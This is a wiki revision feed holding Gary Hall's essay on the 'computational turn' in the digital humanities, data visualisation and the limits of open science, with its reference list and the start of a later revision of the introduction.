[http://www.tannerhiggin.com/2010/05/cultural-politics-critique-and-the-digital-humanities/ Higgen], 2010). &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Witness the current emphasis on making the data not only visible but also visual. Stefanie Posavec’s frequently referred to [http://www.itsbeenreal.co.uk/index.php?/wwwords/literary-organism/ Literary Organism], which visualises the structure of Part One of Kerouac’s ''On the Road'' as a tree, provides one example; those cited earlier courtesy of Lev Manovich and the Software Studies Initiative offer another. Now, there is a long history of critical engagement within the humanities with ideas of the visual, the image, the spectacle, the spectator and so on: not just in critical theory, but also in cultural studies, women’s studies, media studies, film and television studies. Such a history of critical engagement stretches back to Guy Debord’s influential 1967 work, ''The Society of the Spectacle'', and beyond. For example, in his introduction to a 1995 book edited with Lynn Cooke, ''Visual Display: Culture Beyond Appearances'', Peter Wollen writes that an excess of visual display within culture has 'the effect of concealing the truth of the society that produces it, providing the viewer with an unending stream of images that might best be understood, not simply detached from a real world of things, as Debord implied, but as effacing any trace of the symbolic, condemning the viewer to a world in which we can see everything but understand nothing—allowing us viewer-victims, in Debord’s phrase, only &amp;quot;a random choice of ephemera&amp;quot;’ (1995: 9). It can come as something of a surprise, then, to discover that this humanities tradition in which ideas of the visual are engaged critically appears to have had comparatively little impact on the current enthusiasm for data visualisation that is so prominent an aspect of the turn toward data-intensive scholarship. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Of course, this (at times explicit) repudiation of criticality could be precisely what makes certain aspects of the digital humanities so seductive for many at the moment. Exponents of the computational turn can be said to be endeavouring to avoid conforming to accepted (and often moralistic) conceptions of politics that have been decided in advance, including those that see it only in terms of power, ideology, race, gender, class, sexuality, ecology, affect etc. Refusing to [http://www.uchicago.edu/research/jnl-crit-inq/issues/v30/30n2.Latour.html ‘go through the motions of a critical avant-garde’], to borrow the words of Bruno Latour (2004), they often position themselves as responding to what is perceived as a fundamentally new cultural situation, and to the challenge it represents to our traditional methods of studying culture, by avoiding conventional theoretical manoeuvres and by experimenting with the development of fresh methods and approaches for the humanities instead. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Manovich, for instance, sees the sheer scale and dynamics of the contemporary new media landscape as presenting the usually accepted means of studying culture that were dominant for so much of the 20th century – the kinds of theories, concepts and methods appropriate to producing close readings of a relatively small number of texts – with a significant practical and conceptual challenge. In the past, ‘[http://lab.softwarestudies.com/2010/03/cultural-analytics-lecture-by-manovich.html cultural theorists and historians could generate theories and histories] based on small data sets (for instance, “classical Hollywood cinema”, “Italian Renaissance”, etc.) But how can we track “global digital cultures”, with their billions of cultural objects, and hundreds of millions of contributors’, he asks (Manovich, 2010)? Three years ago Manovich was already describing the ‘numbers of people participating in social networks, sharing media, and creating user-generated content’ as simply ‘astonishing’: &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;[http://www.hpcwire.com/features/The_Next_Big_Thing_in_Humanities_Arts_and_Social_Science_Computing_Cultural_Analytics.html MySpace, for example,] claims 300 million users. Cyworld, a Korean site similar to MySpace, claims 90 percent of South Koreans in their 20s and 25 percent of that country's total population (as of 2006) use it. Hi5, a leading social media site in Central America has 100 million users and Facebook, 14 million photo uploads daily. The number of new videos uploaded to YouTube every twenty-four hours (as of July 2006): 65,000. (Manovich in Franklin &amp;amp;amp; Rodriguez’G, 2008)&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; The solution Manovich proposes to this ‘data deluge’ is to turn to the very computers, databases, software and vast amounts of born-digital networked cultural content that are causing the problem in the first place, and to use them to help develop new methods and approaches adequate to the task at hand. This is where what he calls Cultural Analytics comes in. [http://virtueelplatform.nl/kennis/analyzing-culture-in-the-21st-century/ ‘The key idea of Cultural Analytics] is the use of computers to automatically analyze cultural artefacts in visual media, extracting large numbers of features that characterize their structure and content’ (Manovich in Kerssens &amp;amp;amp; Dekker, 2009); and what is more, to do so not just with regard to the culture of the past, but also with that of the present. To this end, Manovich (not unlike the Google technology company) calls for as much of culture as possible to be made available in external, digital form: [http://virtueelplatform.nl/kennis/analyzing-culture-in-the-21st-century/ ‘not only the exceptional but also the typical]; not only the few cultural sentences spoken by a few &amp;quot;great man&amp;quot; [sic] but the patterns in all cultural sentences spoken by everybody else’ (Manovich in Kerssens &amp;amp;amp; Dekker, 2009). &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; In a series of posts on his Found History blog, Tom Scheinfeldt, managing director at the Center for History and New Media at George Mason University, positions such developments in terms of a shift from a concern with theory and ideology to a [http://www.foundhistory.org/2008/03/13/sunset-for-ideology-sunrise-for-methodology/ concern with methodology] (2008). In this respect there may well be a degree of [http://www.tannerhiggin.com/2010/05/cultural-politics-critique-and-the-digital-humanities/ ‘relief in having escaped the culture wars of the 1980s’] – for those in the US especially – as a result of this move ‘into the space of methodological work’ (Croxall, 2010) and what Scheinfeldt reportedly dubs [http://www.nytimes.com/2010/11/17/arts/17digital.html?_r=1&amp;amp;hp=&amp;amp;pagewanted=all ‘the post-theoretical age’] (cited in P. Cohen, 2010). The problem, though, is that without such reflexive critical thinking and theories many of those whose work forms part of this computational turn find it difficult to articulate exactly what the point of what they are doing is, as Scheinfeldt readily acknowledges (2010a). &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Take one of the projects mentioned earlier: the attempt by [http://victorianbooks.org Dan Cohen and Fred Gibbs] to text-mine all the books published in English in the Victorian age (or at least those digitized by Google). Among other things, this allows Cohen and Gibbs to show that use of the word ‘revolution’ in book titles of the period spiked around [http://www.dancohen.org/2010/10/04/searching-for-the-victorians/?utm_source=feedburner&amp;amp;utm_medium=feed&amp;amp;utm_campaign=Feed%3A+DanCohen+%28Dan+Cohen%29&amp;amp;utm_content=Google+Reader ‘the French Revolution and the revolutions of 1848’] (D. Cohen, 2010). But what argument are they trying to make with this calculation? What is it we are able to learn as a result of this use of computational power on their part that we did not know already and could not have discovered without it ([http://www.foundhistory.org/2010/05/12/wheres-the-beef-does-digital-humanities-have-to-answer-questions/ Scheinfeldt], 2008)? &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; In an explicit response to Cohen and Gibbs’s project, Scheinfeldt suggests that the problem of theory, or the lack of it, may actually be a question of scale: &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;[http://www.dancohen.org/2010/10/04/searching-for-the-victorians/?utm_source=feedburner&amp;amp;utm_medium=feed&amp;amp;utm_campaign=Feed%3A+DanCohen+%28Dan+Cohen%29&amp;amp;utm_content=Google+Reader It expects something of the scale of humanities scholarship] which I’m not sure is true anymore: that a single scholar—nay, every scholar—working alone will, over the course of his or her lifetime ... make a fundamental theoretical advance to the field. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Increasingly, this expectation is something peculiar to the humanities. ...it required the work of a generation of mathematicians and observational astronomers, gainfully employed, to enable the eventual “discovery” of Neptune... Since the scientific revolution, most theoretical advances play out over generations, not single careers. (Scheinfeldt, 2010b)&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Now, it is absolutely important that we as scholars experiment with the new tools, methods and materials that digital media technologies create and make possible, in order to bring into play new forms of Foucauldian ''dispositifs'', or what Bernard Stiegler calls ''hypomnemata'', or what I am trying to think in terms of [http://garyhall.info media gifts]. I would include in this 'experimentation imperative’ techniques and methodologies drawn from computer science and other related fields, such as information visualisation, data mining and so forth. Nevertheless, there is something troubling about this kind of deferral of critical and self-reflexive theoretical questions to an unknown point in time, still possibly a generation away. After all, the frequent suggestion is that now is not the right time to be making any such decision or judgement, since we cannot yet know how humanists will eventually come to use these tools and data, and thus what data-driven scholarship may or may not turn out to be capable of, critically, politically, theoretically. One of the consequences of this deferral, however, is that it makes it extremely difficult to judge whether this postponement is indeed acting as a responsible, political and ethical opening to the (heterogeneity and incalculability of the) future, including the future of the humanities; or whether it is serving as an alibi for a naive and rather superficial form of scholarship instead ([https://dhs.stanford.edu/the-digital-humanities-as/the-digital-humanities-as-imagined-community/ Meeks], 2010). A form of scholarship moreover that, in uncritically and un-self-reflexively adopting techniques and methodologies drawn from computer science, can be seen as part of the larger shift in contemporary society which Lyotard associates with the widespread use of computers and databases, and with the exteriorization of knowledge in relation to the ‘knower’. As we have seen, it is a movement away from a concern with ideals, with what is right and just and true, and toward a concern to legitimate power by optimizing the system’s performance in instrumental, functional terms. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; All of this raises some rather significant and timely questions for the humanities. Is it merely a coincidence that such a turn toward science, computing and data-intensive research is gaining momentum at a time when the UK government is emphasizing the importance of the STEM subjects (science, technology, engineering and medicine) and withdrawing support and funding from the humanities? Or is one of the reasons all this is happening now due to the fact that the humanities, like the sciences themselves, are under pressure from government, business, management, industry and increasingly the media to prove they provide value for money in instrumental, functional, performative terms? Is the interest in computing a strategic decision on the part of some of those in the humanities? As the project of Cohen and Gibbs shows, one can get funding from the likes of Google (D. Cohen, 2010). In fact, in the summer of 2010 [http://www.nytimes.com/2010/11/17/arts/17digital.html?_r=1&amp;amp;hp=&amp;amp;pagewanted=all ‘Google awarded $1 million to professors doing digital humanities research’] (P. Cohen, 2010). To what extent is the take-up of practical techniques and approaches from computing science providing some areas of the humanities with a means of defending (and refreshing) themselves in an era of global economic crisis and severe cuts to higher education, through the transformation of their knowledge and learning into quantities of information –- so-called ‘deliverables’? Can we even position the ‘computational turn’ as an event created to justify such a move on the part of certain elements within the humanities ([http://coventryuniversity.podbean.com/2010/11/09/open-software-and-digital-humanities-federica-frabetti/ Frabetti], 2010)? &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Where does all this leave us as far as this Living Book on open science is concerned? As the argument above hopefully demonstrates, it is clearly not enough just to attempt to reveal or recover the scientific truth about, say, the environment, to counter the disinformation of others involved in the likes of the Climategate controversy. Nor is it enough merely to make the scientific research openly accessible to the public. Equally, it is not satisfactory simply to make the information, data, and associated tools, techniques and resources freely available to those in the humanities, so they can collectively and collaboratively search, mine, map, graph, model, visualize, analyse and interpret it in new ways – including some that may make it less abstract and easier for the majority of those in society to understand and follow – and, in doing so, help bridge the gap between the ‘two cultures’. It is not so much that there is a lack of information, or access to the right kind of information, or information presented in the right kind of way to ensure that the message of the scientific research and data comes across effectively and efficiently. It is not even that there is too much information, too much white noise, as ‘Bifo’ et al call it (2009: 141-142). To be sure, as a [http://oxygen.mintel.com/sinatra/reports/display/id=479774 2010 Mintel report] showed – to stay with the example of climate change – most people in the UK already know what is happening to the environment. They are just suffering from Green Fatigue, they are bored with thinking about it and thus enacting a backlash against what they perceive as ‘extreme’ pressure from environmentalist groups. This is perhaps one reason why [http://www.independent.co.uk/environment/climate-change/green-fatigue-hits-campaign-to-reduce-carbon-footprint-2102585.html ‘the number of cars on UK roads has risen from just over 26million in 2005 to more than 31 million in 2009’] (Shields, 2010: 30). Yet to argue there is too much information rather risks implying that there is a proper amount of information, and what would that be?&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; So we might not want to go along with Gilles Deleuze and Felix Guattari when they contend that ‘we do not lack communication. On the contrary, we have too much of it’. But we might nevertheless agree when they argue that what we actually lack is creation: ‘We lack resistance to the present’ (1994: 108). In this respect, it is not just a case of supplying more scientific research and data; nor of making the research and data that has otherwise been closed, hidden, denied or suppressed openly available for free – by opening the already existing memory and databanks to the people, for example (which is what Lyotard ended by suggesting we do). It is also a case of creating work around the research and data that does not simply go along with the shift in the status and nature of knowledge that is currently taking place. As we have seen, it is a shift toward STEM subjects and away from the humanities; toward a concern with optimizing the social system’s performance in instrumental, functional terms, and away from a concern with questions of what is just and right; and toward an emphasis on openness, freedom and transparency, and away from what is capable of disrupting and disturbing society, and what, in remaining resistant to a culture of measurement and calculation, maintains a much needed element of inaccessibility, inefficiency, delay, error, antagonism, heterogeneity and dissensus within the system. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Can this Living Book on open science be considered one such a creation? And can this series of Living Books about Life be considered another? Are they instances of a resistance to the present? Or just more white noise? &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; (The above is based on a paper presented at the Data Landscapes, AHRC network event, held in conjunction with the British Antarctic Survey at the University of Westminster, London, December 15, 2010. An earlier version of some of the material provided above appeared in Hall [2010]) &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; '''References''' &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Arthur, C. (2010), ‘Will Brussels Curb Google Guys’, ''The Guardian'', December 6. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; 'Bifo' Berardi, F., Jacquemet, M. and Vitali, G. (2009), ''Ethereal Shadows: Communications and Power in Contemporary Italy''. Brooklyn, New York: Autonomedia. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Bergman, M. K. (2001), ‘The Deep Web: Surfacing Hidden Value’, ''JEP: The Journal of Electronic Publishing'', vol.7, no.1, August. http://quod.lib.umich.edu/cgi/t/text/text-idx?c=jep;view=text;rgn=main;idno=3336451.0007.104.&amp;amp;nbsp;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Birchall, C. (2011) 'There's Been Too Much Secrecy in this City&amp;quot;: The False Choice Between Secrecy and Transparency in US Politics,' ''Cultural Politics''&amp;amp;nbsp;7(1), March: 133-156.&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;Birchall, C (2011b forthcoming) ‘Transparency, Interrupted: Secrets of the Left’, Between Transparency and Secrecy', Annual Review, ''Theory, Culture and Society, ''December.&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Blair, T. (2010), ''A Journey''. London: Hutchinson. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Clinton, H. (2010), ‘Internet Freedom: The Prepared Text of U.S. of Secretary of State Hillary Rodham Clinton's speech, delivered at the Newseum in Washington, D.C., January 21. http://www.foreignpolicy.com/articles/2010/01/21/internet_freedom?page=full &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Cohen, D. (2010), ‘Searching for the Victorians’, ''Dan Cohen'', October 4. http://www.dancohen.org/2010/10/04/searching-for-the-victorians/?utm_source=feedburner&amp;amp;amp;utm_medium=feed&amp;amp;amp;utm_campaign=Feed%3A+DanCohen+%28Dan+Cohen%29&amp;amp;amp;utm_content=Google+Reader. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Cohen, P. (2010) ‘Digital Keys for Unlocking the Humanities’ Riches’, ''The New York Times'', November 16. http://www.nytimes.com/2010/11/17/arts/17digital.html?_r=1&amp;amp;amp;hp=&amp;amp;amp;pagewanted=all. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Croxall, B. (2010) response to Tanner Higgen, ‘Cultural Politics, Critique, and the Digital Humanities’, ''Gaming the System''. September 10. http://www.tannerhiggin.com/2010/05/cultural-politics-critique-and-the-digital-humanities/. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Deleuze G. and Guattari, F. (1988) ''A Thousand Plateaus: Capitalism and Schizophrenia''. London: Athlone. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Deleuze G. and Guattari, F. (1994), ''What is Philosophy?''. New York: Columbia University Press. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Fung, A., Graham, M., Weil, D. (2007), ''Full Disclosure: The Perils and Promise of Transparency''. Cambridge: Cambridge University Press. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Frabetti, F. (2010) ‘Digital Again? The Humanities Between the Computational Turn and Originary Technicity’, talk given to the Open Media Group, Coventry School of Art and Design. November 9. http://coventryuniversity.podbean.com/2010/11/09/open-software-and-digital-humanities-federica-frabetti/. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Franklin, K. D. and Rodriguez’G, K. (2008) ‘The Next Big Thing in Humanities, Arts and Social Science Computing: Cultural Analytics’,''HPC Wire''. July 29. http://www.hpcwire.com/features/The_Next_Big_Thing_in_Humanities_Arts_and_Social_Science_Computing_Cultural_Analytics.html. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Gibbs, R. (2010), Presidential press secretary, cited in ‘White House condemns WikiLeaks' release’, ''MCNBC.com News'', November 28. http://www.msnbc.msn.com/id/40405589/ns/us_news-security. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Gurstein, M. (2010a), ‘Open Data: Empowering the Empowered or Effective Data Use for Everyone?’, ''Gurstein’s Community Infomatics'', September, 2. http://gurstein.wordpress.com/2010/09/02/open-data-empowering-the-empowered-or-effective-data-use-for-everyone/. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Gurstein, M. (2010b), ‘Open Data (2): Effective Data Use’, ''Gurstein’s Community Infomatics'', September, 9. http://gurstein.wordpress.com/2010/09/09/open-data-2-effective-data-use/ &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Gurstein, M. (2011), ‘Are the Open Data Warriors Fighting for Robin Hood or the Sheriff?: Some Reflections on OKCon 2011 and the Emerging Data Divide’, posting to the nettime mailing list, July, 5. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Hall, G. (2010), 'We Can Know It For You: The Secret Life of Metadata', ''How We Became Metadata''. London: Institute for Modern and Contemporary Culture, University of Westminster. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Higgen, T. (2010) ‘Cultural Politics, Critique, and the Digital Humanities’, ''Gaming the System''. May 25. http://www.tannerhiggin.com/2010/05/cultural-politics-critique-and-the-digital-humanities/. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Hindman, M. (2009), ''The Myth of Digital Democracy''. Princeton, NJ and Oxford: Princeton University Press. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Hoffman, M. (2010), ‘EFF Posts Documents Detailing Law Enforcement Collection of Data From Social Media Sites’, ''Electronic Frontier Foundation''. March 16. http://www.eff.org/deeplinks/2010/03/eff-posts-documents-detailing-law-enforcement. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Houghton, J. (2009) ‘Open Access - What are the Economic Benefits?: A Comparison of the United Kingdom, Netherlands and Denmark’, Centre for Strategic Economic Studies, Victoria University, Melbourne. http://www.knowledge-exchange.info/Admin/Public/DWSDownload.aspx?File=%2fFiles%2fFiler%2fdownloads%2fOA_What_are_the_economic_benefits_-_a_comparison_of_UK-NL-DK__FINAL_logos.pdf. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Jarvis, J. (2010), ‘Time For Citizens of the Internet to Stand Up’, ''The Guardian: MediaGuardian'', March 29. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; JISC (2009), ‘Press Release: Open Science - the future for research?, posting to the BOAI list, November 16. 2009. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Kerssens, N. and Dekker A. (2009), ‘Interview with Lev Manovich for Archive 2020’, ''Virtueel_ Platform''. http://www.virtueelplatform.nl/#2595. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Knouf, N. (2010), ‘The JJPS Extension: Presenting Academic Performance Information’, ''Journal of Journal Performance Studies'', Vol 1, No 1. Available at http://journalofjournalperformancestudies.org/journal/index.php/jjps/article/view/6/6. Accessed 20 June, 2010. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Latour, B (2004), ‘Why Has Critique Run Out of Steam? From Matters of Fact to Matters of Concern”’, ''Critical Inquiry'', Vol. 30, Number 2. http://www.uchicago.edu/research/jnl-crit-inq/issues/v30/30n2.Latour.html. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Liu, A. (2011) ‘Where is Cultural Criticism in the Digital Humanities’. Paper presented at the panel on ‘The History and Future of the Digital Humanities’” Modern Language Association convention, Los Angeles, January 7. http://liu.english.ucsb.edu/where-is-cultural-criticism-in-the-digital-humanities. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Lyotard, J-F. (1986), ''The Postmodern Condition: A Report on Knowledge''. Manchester: Manchester University Press. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Lyotard, J.-F. (1991) ''The Inhuman: Reflections on Time''. Cambridge: Polity. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Manovich, L. (2010a) ‘Cultural Analytics Lectures by Manovich in UK (London and Swansea), March 8-9, 2010’, ''Software Studies Initiative''. March 8. http://lab.softwarestudies.com/2010/03/cultural-analytics-lecture-by-manovich.html. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Manovich, L. (2011) ‘Trending: The Promises and the Challenges of Big Social Data’,''Lev Manovich'', April 28: http://www.manovich.net/DOCS/Manovich_trending_paper.pdf. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Meeks, E. (2010), ‘The Digital Humanities as Imagined Community’, ''Digital Humanities Specialist''. September 14. https://dhs.stanford.edu/the-digital-humanities-as/the-digital-humanities-as-imagined-community/. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Mintel report, ‘Energy Efficiency in the Home - UK - July 2010’. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Murray, S. Choi, S., Hoey, J., Kendall, C., Maskalyk, J., and Palepu, A. (2008), ‘Open Science, Open Access and Open Source Software at ''Open Medicine''’, ''Open Medicine'', 2(1): e1–e3. http://www.ncbi.nlm.nih.gov/pmc/articles/PMC3091592/?tool=pmcentrez http://www.ncbi.nlm.nih.gov/pmc/articles/PMC3091592/pdf/OpenMed-02-e1.pdf??tool=pmcentrez &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Patterson, M. (2009), ‘Article-Level Metrics at PloS – Addition of Usage Data’, ''PLoS: Public Library of Science''. September 16. http://blogs.plos.org/plos/2009/09/article-level-metrics-at-plos-addition-of-usage-data/. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Pubget (2010), ‘[BOAI] PLoS Launches Fast (Open) PDF Access with Pubget’, posted on the BOAI list by Peter Suber, March 8. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Poynder, R. (2010), ‘Interview With Jean-Claude Bradley: The Impact of Open Notebook Science’, ''Information Today'', September. http://www.infotoday.com/IT/sep10/Poynder.shtml. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Scheinfeldt, T. (2008), ‘Sunset for Ideology, Sunrise for Methodology?’, ''Found History'', March 13. http://www.foundhistory.org/2008/03/13/sunset-for-ideology-sunrise-for-methodology/ &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Scheinfeldt, T. (2010a) ‘Where’s the Beef?: Does Digital Humanities Have to Answer Questions?’, ''Found History'', March 13. http://www.foundhistory.org/2010/05/12/wheres-the-beef-does-digital-humanities-have-to-answer-questions/. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Scheinfeldt, T. (2010b) response to Dan Cohen, ‘Searching for the Victorians’, ''Dan Cohen''. October 5. http://www.dancohen.org/2010/10/04/searching-for-the-victorians/?utm_source=feedburner&amp;amp;amp;utm_medium=feed&amp;amp;amp;utm_campaign=Feed%3A+DanCohen+%28Dan+Cohen%29&amp;amp;amp;utm_content=Google+Reader. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Shields, R. (2010), ‘Green Fatigue Hits Campaign to Reduce Carbon Footprint’, ''The Independent'', October 10. http://www.independent.co.uk/environment/climate-change/green-fatigue-hits-campaign-to-reduce-carbon-footprint-2102585.html. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Sterling, B. (2005), ''Shaping Things''. Massachussetts: MIT. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Stolberg, S. G. (2009), ‘On First Day, Obama Quickly Sets a New Tone’”, ''The New York Times''. January 21. http://www.nytimes.com/2009/01/22/us/politics/22obama.html. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Swan, A. (2009), ‘Open Access and Open Data’, ''2nd NERC Data Management Workshop'', Oxford. February 17-18. http://eprints.ecs.soton.ac.uk/17424/. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Swartz, A. (2010), ‘When is Transparency Useful?’ ''Aaron Swartz’s Raw Thought blog'', February 11. http://www.aaronsw.com/weblog/usefultransparency. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Vaidhyanathan, S. (2009), ‘The Googlization of Universities’, ''The NEA 2009 Almanac of Higher Education''. http://www.nea.org/assets/img/PubAlmanac/ALM_09_06.pdf &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Wark, M. (2004), ''A Hacker Manifesto''. Harvard: Harvard University Press. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Westcott, S. (2009) ‘Global Warming: Brits Deny Humans are to Blame,’ ''The Express'', December 7. http://www.express.co.uk/posts/view/144551/Global-warming-Brits-deny-humans-are-to-blame &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; The White House (2009), ‘Memorandum for the Heads of Executive Departments and Agencies: Transparency and Open Government’. January 21. http://www.whitehouse.gov/the_press_office/TransparencyandOpenGovernment/ &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Wollen, P. and Cooke, L. eds (1995), ''Visual Display: Culture Beyond Appearances''. Seattle: Bay Press.&lt;/div&gt;</summary>
		<author><name>Garyhall</name></author>
	</entry>
	<entry>
		<id>https://livingbooksaboutlife.org/wiki/index.php?title=Open_science/Introduction&amp;diff=5503</id>
		<title>Open science/Introduction</title>
		<link rel="alternate" type="text/html" href="https://livingbooksaboutlife.org/wiki/index.php?title=Open_science/Introduction&amp;diff=5503"/>
		<updated>2013-11-03T14:56:33Z</updated>

		<summary type="html">&lt;p&gt;Garyhall: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[http://www.livingbooksaboutlife.org/books/Digitize_Me,_Visualize_Me,_Search_Me Back to the book] &amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
= '''White Noise: On the Limits of Openness (Living Book Mix)'''  =&lt;br /&gt;
&lt;br /&gt;
= Gary Hall  =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;lt;youtube&amp;gt;PH54cp2ggFk&amp;lt;/youtube&amp;gt; &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; One of the explicit aims of the Living Books About Life series is to provide a&amp;amp;nbsp; point of interrogation and contestation, as well as connection and translation, between the humanities and the sciences (partly to avoid slipping into 'scientism'). Accordingly, this introduction to ''Digitize Me, Visualize Me, Search Me'' takes as its starting point the so-called ‘computational turn’ to data-intensive scholarship in the humanities. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; The phrase ‘[http://www.thecomputationalturn.com/ the computational turn]’ has been adopted to refer to the process whereby techniques and methodologies drawn from (in this case) ''computer science'' and related fields – including science visualization, interactive information visualization, image processing, network analysis, statistical data analysis, and the management, manipulation and mining of data – are being used to produce new ways of approaching and understanding texts in the humanities; what is sometimes thought of as ‘the digital humanities’. The concern in the main has been with either digitizing ‘born analog’ humanities texts and artifacts (e.g. making annotated editions of the art and writing of [http://www.blakearchive.org/blake/ William Blake] available to scholars and researchers online), or gathering together ‘born digital’ humanities texts and artifacts (videos, websites, games, photography, sound recordings, 3D data), and then taking complex and often extremely large-scale data analysis techniques from computing science and related fields and applying them to these humanities texts and artifacts - to this ‘big data’, as it has been called. Witness Lev Manovich and the Software Studies Initiative’s use of ‘[http://www.manovich.net/DOCS/Manovich_trending_paper.pdf digital image analysis and new visualization techniques]’ to study ‘20,000 pages of Science and Popular Science magazines… published between 1872-1922, 780 paintings by van Gogh, 4535 covers of Time magazine (1923-2009) and one million manga pages’ (Manovich, 2011), and Dan Cohen and Fred Gibb’s text mining of ‘[http://www.dancohen.org/2010/10/04/searching-for-the-victorians/?utm_source=feedburner&amp;amp;utm_medium=feed&amp;amp;utm_campaign=Feed%3A+DanCohen+%28Dan+Cohen%29&amp;amp;utm_content=Google+Reader the 1,681,161 books that were published in English in the UK in the long nineteenth century]’ (Cohen, 2010). &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; ''What Digitize Me, Visualize Me, Search Me'' endeavours to show is that such data-focused transformations in research can be seen as part of a major alteration in the status and nature of knowledge. It is an alteration that, according to the philosopher Jean-François Lyotard, has been taking place since at least the 1950s, and involves nothing less than a shift away from a concern with questions of what is right and just, and toward a concern with legitimating power by optimizing the social system’s performance in instrumental, functional terms. This shift has significant consequences for our idea of knowledge. Indeed, for Lyotard: &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;The nature of knowledge cannot survive unchanged within this context of general transformation. It can fit into the new channels, and become operational, only if learning is translated into quantities of information. We can predict that anything in the constituted body of knowledge that is not translatable in this way will be abandoned and that the direction of new research will be dictated by the possibility of its eventual results being translatable into computer language. The ‘producers’ and users of knowledge must now, and will have to, possess the means of translating into these language whatever they want to invent or learn. Research on translating machines is already well advanced. Along with the hegemony of computers comes a certain logic, and therefore a certain set of prescriptions determining which statements are accepted as ‘knowledge’ statements. (1986: 4)&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
